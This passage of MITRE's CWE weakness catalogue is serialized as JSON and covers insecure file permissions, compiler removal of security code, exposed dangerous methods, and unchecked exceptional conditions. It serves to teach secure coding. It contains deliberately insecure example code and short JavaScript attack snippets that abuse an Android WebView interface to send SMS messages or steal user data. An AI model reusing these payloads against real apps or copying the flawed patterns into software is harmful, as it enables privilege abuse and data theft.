make the file world-writable.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$fileName = \\"secretFile.out\\";if (-e $fileName) {}my $outFH;if (! open($outFH, \\">>$fileName\\")) {}my $dateString = FormatCurrentTime();my $status = IsHostAlive(\\"cwe.mitre.org\\");print $outFH \\"$dateString cwe status: $status!\\\\n\\";close($outFH);","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"#text":"chmod 0777, $fileName;","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Couldn\'t append to $fileName: $!\\");","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"result"},"xhtml:div":"-rw-r--r-- 1 username 13 Nov 24 17:58 secretFile.out"},{"attr":{"@_Nature":"result"},"xhtml:div":"-rw-rw-rw- 1 username 13 Nov 24 17:58 secretFile.out"}],"Body_Text":["The first time the program runs, it might create a new file that inherits the permissions from its environment. A file listing might look like:","This listing might occur when the user has a default umask of 022, which is a common setting. Depending on the nature of the file, the user might not have intended to make it readable by everyone on the system.","The next time the program runs, however - and all subsequent executions - the chmod will set the file\'s permissions so that the owner, group, and world (all users) can read the file and write to it:","Perhaps the programmer tried to do this because a different process uses different permissions that might prevent the file from being updated."]},{"Intro_Text":"The following command recursively sets world-readable permissions for a directory and all of its children:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Shell"},"xhtml:div":"chmod -R ugo+r DIRNAME"},"Body_Text":"If this command is run from a program, the person calling the program might not expect that all the files under the directory will be world-readable. If the directory is expected to contain private data, this could become a security problem."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3482","Description":"Anti-virus product sets insecure \\"Everyone: Full Control\\" permissions for files under the \\"Program Files\\" folder, allowing attackers to replace executables with Trojan horses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3482"},{"Reference":"CVE-2009-3897","Description":"Product creates directories with 0777 permissions at installation, allowing users to gain privileges and access a socket used for authentication.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3897"},{"Reference":"CVE-2009-3489","Description":"Photo editor installs a service with an insecure security descriptor, allowing users to stop or start the service, or execute commands as SYSTEM.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3489"},{"Reference":"CVE-2020-15708","Description":"socket created with insecure permissions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15708"},{"Reference":"CVE-2009-3289","Description":"Library function copies a file to a new target and uses the source file\'s permissions for the target, which is incorrect when the source file is a symbolic link, which typically has 0777 permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3289"},{"Reference":"CVE-2009-0115","Description":"Device driver uses world-writable permissions for a socket file, allowing attackers to inject arbitrary commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0115"},{"Reference":"CVE-2009-1073","Description":"LDAP server stores a cleartext password in a world-readable file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1073"},{"Reference":"CVE-2009-0141","Description":"Terminal emulator creates TTY devices with world-writable permissions, allowing an attacker to write to the terminals of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0141"},{"Reference":"CVE-2008-0662","Description":"VPN product stores user credentials in a registry key with \\"Everyone: Full Control\\" permissions, allowing attackers to steal the credentials.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0662"},{"Reference":"CVE-2008-0322","Description":"Driver installs its device interface with \\"Everyone: Write\\" permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0322"},{"Reference":"CVE-2009-3939","Description":"Driver installs a file with world-writable permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3939"},{"Reference":"CVE-2009-3611","Description":"Product changes permissions to 0777 before deleting a backup; the permissions stay insecure for subsequent backups.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3611"},{"Reference":"CVE-2007-6033","Description":"Product creates a share with \\"Everyone: Full Control\\" permissions, allowing arbitrary program execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6033"},{"Reference":"CVE-2007-5544","Description":"Product uses \\"Everyone: Full Control\\" permissions for memory-mapped files (shared memory) in inter-process communication, allowing attackers to tamper with a session.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5544"},{"Reference":"CVE-2005-4868","Description":"Database product uses read/write permissions for everyone for its shared memory, allowing theft of credentials.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4868"},{"Reference":"CVE-2004-1714","Description":"Security product uses \\"Everyone: Full Control\\" permissions for its configuration files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1714"},{"Reference":"CVE-2001-0006","Description":"\\"Everyone: Full Control\\" permissions assigned to a mutex allows users to disable network connectivity.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0006"},{"Reference":"CVE-2002-0969","Description":"Chain: database product contains buffer overflow that is only reachable through a .ini configuration file - which has \\"Everyone: Full Control\\" permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0969"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO03-J","Entry_Name":"Create files with appropriate access permission"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC01-J","Entry_Name":"Do not allow tainted variables in privileged blocks"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ENV03-J","Entry_Name":"Do not grant dangerous combinations of permissions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO06-C","Entry_Name":"Create files with appropriate access permissions"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"122"}},{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"206"}},{"attr":{"@_CAPEC_ID":"234"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"61"}},{"attr":{"@_CAPEC_ID":"62"}},{"attr":{"@_CAPEC_ID":"642"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "File Permissions." Page 495"}},{"attr":{"@_External_Reference_ID":"REF-207","@_Section":"Chapter 8, "Access Control." Page 194"}},{"attr":{"@_External_Reference_ID":"REF-594"}},{"attr":{"@_External_Reference_ID":"REF-199"}}]},"Notes":{"Note":{"#text":"The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-08","Submission_Comment":"new weakness-focused entry for Research view."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Likelihood_of_Exploit, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}],"Previous_Entry_Name":[{"#text":"Insecure Permission Assignment for Resource","attr":{"@_Date":"2009-01-12"}},{"#text":"Insecure Permission Assignment for Critical Resource","attr":{"@_Date":"2009-05-27"}}]}},"733":{"attr":{"@_ID":"733","@_Name":"Compiler Optimization Removal or Modification of Security-critical Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The developer builds a security-critical protection mechanism into the software, but the compiler optimizes the program such that the mechanism is removed or modified.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1038","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Compiled","@_Prevalence":"Undetermined"}}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"This specific weakness is impossible to detect using black box methods. While an analyst could examine memory to see that it has not been scrubbed, an analysis of the executable would not be successful. This is because the compiler has already removed the relevant code. Only the source code shows whether the programmer intended to clear the memory or not, so this weakness is indistinguishable from others."},{"Method":"White Box","Description":"This weakness is only detectable using white box methods (see black box detection factor). Careful analysis is required to determine if the code is likely to be removed by the compiler."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1685","Description":"C compiler optimization, as allowed by specifications, removes code that is used to perform checks to detect integer overflows.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1685"},{"Reference":"CVE-2019-1010006","Description":"Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010006"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, "A Compiler Optimization Caveat" Page 322"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-10-01","Submission_Comment":"new weakness-focused entry for Research view closes the gap between 14 and 435."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Applicable_Platforms, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"}]}},"749":{"attr":{"@_ID":"749","@_Name":"Exposed Dangerous Method or Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.","Extended_Description":{"xhtml:p":["This weakness can lead to a wide variety of resultant weaknesses, depending on the behavior of the exposed method. It can apply to any number of technologies and approaches, such as ActiveX controls, Java functions, IOCTLs, and so on.","The exposure can occur in a few different ways:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["1) The function/method was never intended to be exposed to outside actors.","2) The function/method was only intended to be accessible to a limited set of actors, such as Internet-based access from a single web site."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Read Application Data","Modify Application Data","Execute Unauthorized Code or Commands","Other"],"Note":"Exposing critical functionality essentially provides an attacker with the privilege level of the exposed functionality. This could result in the modification or exposure of sensitive data or possibly even execution of arbitrary code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities."},{"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be:","Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["accessible to all users","restricted to a small set of privileged users","prevented from being directly accessible at all"]}}}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java example the method removeDatabase will delete the database with the name specified in the input parameter.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void removeDatabase(String databaseName) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (SQLException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Statement stmt = conn.createStatement();stmt.execute(\\"DROP DATABASE \\" + databaseName);","xhtml:br":["",""]}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private void removeDatabase(String databaseName) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (SQLException ex) {...}}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Statement stmt = conn.createStatement();stmt.execute(\\"DROP DATABASE \\" + databaseName);","xhtml:br":["",""]}},"xhtml:br":""}}}}],"Body_Text":"The method in this example is declared public and therefore is exposed to any class in the application. Deleting a database should be considered a critical operation within an application and access to this potentially dangerous method should be restricted. Within Java this can be accomplished simply by declaring the method private thereby exposing it only to the enclosing class as in the following example."},{"attr":{"@_Demonstrative_Example_ID":"DX-109"},"Intro_Text":"These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){}","xhtml:i":"// Android","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (url.substring(0,14).equalsIgnoreCase(\\"examplescheme:\\")){}","xhtml:div":{"#text":"if(url.substring(14,25).equalsIgnoreCase(\\"getUserInfo\\")){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"writeDataToView(view, UserData);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return true;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"Objective-C"},"xhtml:div":{"#text":"-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{}","xhtml:i":"// iOS","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@\\"exampleScheme\\"]){}return YES;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@\\"specialFunction\\"]){}return NO;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UIWebView *webView = [self writeDataToView:[URL query]];","xhtml:br":["",""],"xhtml:i":"// Make data available back in webview."}}}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["A call into native code can then be initiated by passing parameters within the URL:","Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site."]},{"Intro_Text":"This application uses a WebView to display websites, and creates a Javascript interface to a Java object to allow enhanced functionality on a trusted website:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class WebViewGUI extends Activity {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"WebView mainWebView;public void onCreate(Bundle savedInstanceState) {}final class JavaScriptInterface {}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"super.onCreate(savedInstanceState);mainWebView = new WebView(this);mainWebView.getSettings().setJavaScriptEnabled(true);mainWebView.addJavascriptInterface(new JavaScriptInterface(), \\"userInfoObject\\");mainWebView.loadUrl(\\"file:///android_asset/www/index.html\\");setContentView(mainWebView);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"JavaScriptInterface () {}public String getUserInfo() {}","xhtml:br":["",""],"xhtml:div":{"#text":"return currentUser.Info();","attr":{"@_style":"margin-left:10px;"}}}}]}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":{"#text":"<script></script>","xhtml:div":{"#text":"userInfoObject.getClass().forName(\'android.telephony.SmsManager\').getMethod(\'getDefault\',null).sendTextMessage(attackNumber, null, attackMessage, null, null);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["Before Android 4.2 all methods, including inherited ones, are exposed to Javascript when using addJavascriptInterface(). This means that a malicious website loaded within this WebView can use reflection to acquire a reference to arbitrary Java objects. This will allow the website code to perform any action the parent application is authorized to.","For example, if the application has permission to send text messages:","This malicious script can use the userInfoObject object to load the SmsManager object and send arbitrary text messages to any recipient."]},{"Intro_Text":"After Android 4.2, only methods annotated with @JavascriptInterface are available in JavaScript, protecting usage of getClass() by default, as in this example:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"final class JavaScriptInterface {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"JavaScriptInterface () { }@JavascriptInterfacepublic String getUserInfo() {}","xhtml:br":["","",""],"xhtml:div":{"#text":"return currentUser.Info();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":{"#text":"<script></script>","xhtml:div":{"#text":"var info = window.userInfoObject.getUserInfo();sendUserInfo(info);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}],"Body_Text":["This code is not vulnerable to the above attack, but still may expose user info to malicious pages loaded in the WebView. Even malicious iframes loaded within a trusted page may access the exposed interface:","This malicious code within an iframe is able to access the interface object and steal the user\'s data."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-6382","Description":"arbitrary Java code execution via exposed method","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6382"},{"Reference":"CVE-2007-1112","Description":"security tool ActiveX control allows download or upload of files","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1112"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-503"}},{"attr":{"@_External_Reference_ID":"REF-510"}}]},"Notes":{"Note":{"#text":"Under-reported and under-studied. This weakness could appear in any technology, language, or framework that allows the programmer to provide a functional interface to external parties, but it is not heavily reported. In 2007, CVE began showing a notable increase in reports of exposed method vulnerabilities in ActiveX applications, as well as IOCTL access to OS-level resources. These weaknesses have been documented for Java applications in various secure programming sources, but there are few reports in CVE, which suggests limited awareness in most parts of the vulnerability research community.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-11-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Exposed Insecure Method or Function","attr":{"@_Date":"2009-01-12"}}}},"754":{"attr":{"@_ID":"754","@_Name":"Improper Check for Unusual or Exceptional Conditions","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not check or incorrectly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the software.","Extended_Description":{"xhtml:p":["The programmer may assume that certain events or conditions will never occur or do not need to be worried about, such as low memory conditions, lack of access to resources due to restrictive permissions, or misbehaving clients or components. However, attackers may intentionally trigger these unusual conditions, thus violating the programmer\'s assumptions, possibly introducing instability, incorrect behavior, or a vulnerability.","Note that this entry is not exclusively about the use of exceptions and exception handling, which are mechanisms for both checking and handling unusual or unexpected conditions."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Many functions will return some value about the success of their actions. This will alert the program whether or not to handle any errors caused by that function."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Unexpected State"],"Note":"The data which were produced as a result of a function call could be in a bad state upon return. If the return value is not checked, then this bad data may be used in operations, possibly leading to a crash or other unintended behaviors."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"Automated static analysis may be useful for detecting unusual conditions involving system resources or common programming idioms, but not for violations of business rules.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Choose languages with features such as exception handling that force the programmer to anticipate unusual conditions that may generate exceptions. Custom exceptions may need to be developed to handle unusual business-logic conditions. Be careful not to pass sensitive exceptions back to the user (CWE-209, CWE-248)."]}},{"Phase":"Implementation","Description":"Check the results of all functions that return a value and verify that the value is expected.","Effectiveness":"High","Effectiveness_Notes":"Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment."},{"Phase":"Implementation","Description":"If using exception handling, catch and throw specific exceptions instead of overly-general exceptions (CWE-396, CWE-397). Catch and handle 